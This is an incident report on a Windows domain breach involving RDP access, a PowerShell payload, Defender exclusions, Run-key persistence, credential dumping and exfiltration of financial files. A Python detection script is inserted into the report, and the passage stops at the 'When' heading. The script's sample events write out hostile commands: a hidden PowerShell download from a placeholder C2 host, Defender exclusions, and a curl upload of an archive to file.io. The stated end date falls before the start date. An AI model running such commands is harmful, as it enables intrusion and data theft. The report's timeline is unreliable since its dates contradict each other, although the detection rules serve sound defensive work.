Executive Summary

We experienced a Critical Security Breach involving confirmed data exfiltration and the compromise of our core identity infrastructure. The incident began at 2025-10-07 04:13:08 UTC and ended at 2025-07-10 08:11:59 UTC, a window of approximately four hours of confirmed unauthorized access that culminated in the exfiltration of sensitive files. The attacker bypassed security controls, stole domain administrator credentials, and uploaded confidential Financial, Tax, and Payroll documents to a cloud storage service. The incident is classified as Catastrophic because regulated data was confirmed lost and our Active Directory was compromised. Immediate action is required to contain the threat and prevent further loss of domain integrity.


Findings

The attacker successfully logged in to mts-contractorpc1 using the administrator account via an interactive RDP session (Logon Type 10).

The built-in Windows tool PowerShell was used to download a scripted payload from the internet via the attacker's C2 infrastructure on a non-standard port. The file carried a .ps1 extension and a name masquerading as a legitimate security update.

A script was executed to add exclusions for multiple processes and file paths, likely to prevent security tools from detecting malicious activity.

A malicious executable was staged in a publicly writable/permissive directory and a Registry Run key was created that referenced a hidden PowerShell command, ensuring the payload executes at user logon.

Registry changes were made to maintain persistence: a Run key was modified to launch the malicious payload, with the entry masquerading as a benign OneStandalone item to hide it among legitimate startup entries.

A credential-dumping binary (likely Mimikatz) was downloaded via the C2 mechanism and executed to read sensitive information from LSASS memory.

Sensitive company files (tax, finance, payroll, bank information) were opened (via Notepad), aggregated into an archive named backup.zip, and uploaded to a cloud storage service (file.io) for exfiltration.
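As an added example (not part of the original report), the Python below runs a detection pass over constructed Windows Security/Sysmon event records shaped like the chain in the findings above: RDP logon type 10, a PowerShell .ps1 download, Defender exclusions, a hidden-PowerShell Run key, LSASS access, and a zip upload to file.io. The hostnames, file paths, the c2.invalid domain and the svc.exe name are made-up placeholders.

```python
"""Detection pass over constructed Windows event records shaped like the chain in
the findings; field names loosely follow Security (4624, 4688) and Sysmon (10, 13)."""
import re

# Constructed sample events, not copied from the incident's real logs.
EVENTS = [
    {"src": "Security", "id": 4624, "user": "administrator", "logon_type": 10},
    {"src": "Security", "id": 4688, "cmd": "powershell.exe -w hidden Invoke-WebRequest "
     "http://c2.invalid:8443/SecurityUpdate.ps1 -OutFile C:\\Users\\Public\\SecurityUpdate.ps1"},
    {"src": "Security", "id": 4688, "cmd": "powershell.exe Add-MpPreference "
     "-ExclusionPath C:\\Users\\Public -ExclusionProcess powershell.exe"},
    {"src": "Sysmon", "id": 13, "target": "HKCU\\Software\\Microsoft\\Windows\\"
     "CurrentVersion\\Run\\OneStandalone", "details": "powershell.exe -w hidden -File C:\\Users\\Public\\update.ps1"},
    {"src": "Sysmon", "id": 10, "source_image": "C:\\Users\\Public\\svc.exe",
     "target_image": "C:\\Windows\\System32\\lsass.exe"},
    {"src": "Security", "id": 4688, "cmd": "notepad.exe C:\\Finance\\Payroll_2025.xlsx"},
    {"src": "Security", "id": 4688, "cmd": "curl.exe -F file=@C:\\Users\\Public\\backup.zip https://file.io"},
]

PS_DOWNLOAD = re.compile(r"powershell.*(invoke-webrequest|iwr|downloadstring|downloadfile).*\.ps1", re.I)

def _cmd(e):
    return e.get("cmd", "").lower()

# One rule per stage reported in the findings, in the order they occurred.
RULES = [
    ("rdp_admin_logon", lambda e: e["id"] == 4624 and e.get("logon_type") == 10
     and e.get("user", "").lower() == "administrator"),
    ("ps_remote_script_download", lambda e: e["id"] == 4688 and bool(PS_DOWNLOAD.search(e.get("cmd", "")))),
    ("defender_exclusion_added", lambda e: "add-mppreference" in _cmd(e) and "-exclusion" in _cmd(e)),
    ("run_key_hidden_powershell", lambda e: e["src"] == "Sysmon" and e["id"] == 13
     and "\\currentversion\\run\\" in e.get("target", "").lower()
     and "powershell" in e.get("details", "").lower()
     and any(f in e.get("details", "").lower() for f in ("-w hidden", "-windowstyle hidden", "-enc"))),
    ("lsass_access", lambda e: e["src"] == "Sysmon" and e["id"] == 10
     and e.get("target_image", "").lower().endswith("\\lsass.exe")),
    ("cloud_exfil_upload", lambda e: e["id"] == 4688 and "file.io" in _cmd(e) and ".zip" in _cmd(e)),
]

def hunt(events):
    """Return the names of the rules that fired, in first-hit order, without duplicates."""
    hits = []
    for e in events:
        for name, pred in RULES:
            if name not in hits and pred(e):
                hits.append(name)
    return hits

def chain_complete(hits):
    """True when every stage of the reported chain was observed."""
    return all(name in hits for name, _ in RULES)
```

Any single rule firing is worth triage on its own; seeing the full ordered chain on one host is the signal that the findings above describe.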


Who, What, When, Where, Why, How

Who

The administrator account logged on to mts-contractorpc1, moved laterally to the Domain Controller mts-dc.mts.local, and several files were accessed and exfiltrated.

What

A full domain compromise carried out to steal sensitive financial and personnel data, including tax documents, payroll, and bank information, subsequently leading to data exfiltration.

When